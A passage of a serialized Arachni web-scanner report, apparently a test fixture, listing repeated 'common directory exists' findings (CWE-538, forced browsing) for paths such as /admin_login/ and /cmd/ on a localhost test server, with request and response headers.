    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/index/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: index
    injected: index
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: index
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/index/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/default/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: default
    injected: default
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: default
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/default/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/details/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: details
    injected: details
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: details
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/details/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/example/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: example
    injected: example
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: example
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/example/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/examples/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: examples
    injected: examples
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: examples
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/examples/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/send/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: send
    injected: send
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: send
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/send/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/settings/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: settings
    injected: settings
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: settings
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/settings/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/feedback/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: feedback
    injected: feedback
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: feedback
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/feedback/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/global/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: global
    injected: global
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: global
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/global/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/globals/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: globals
    injected: globals
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: globals
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/globals/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/guestbook/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "9"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: guestbook
    injected: guestbook
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: guestbook
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/guestbook/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/admin_/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: admin_
    injected: admin_
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: admin_
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/admin_/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/admin_login/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "11"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: admin_login
    injected: admin_login
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: admin_login
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/admin_login/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/admin_logon/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "11"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: admin_logon
    injected: admin_logon
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: admin_logon
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/admin_logon/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/adminlogon/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "10"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: adminlogon
    injected: adminlogon
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: adminlogon
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/adminlogon/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/client/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: client
    injected: client
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: client
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/client/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/clients/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: clients
    injected: clients
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: clients
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/clients/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/cmd/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: cmd
    injected: cmd
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: cmd
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/cmd/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/INSTALL_admin/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "13"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: INSTALL_admin
    injected: INSTALL_admin
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: INSTALL_admin
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/INSTALL_admin/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/incomming/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "9"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: incomming
    injected: incomming
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: incomming
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/incomming/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
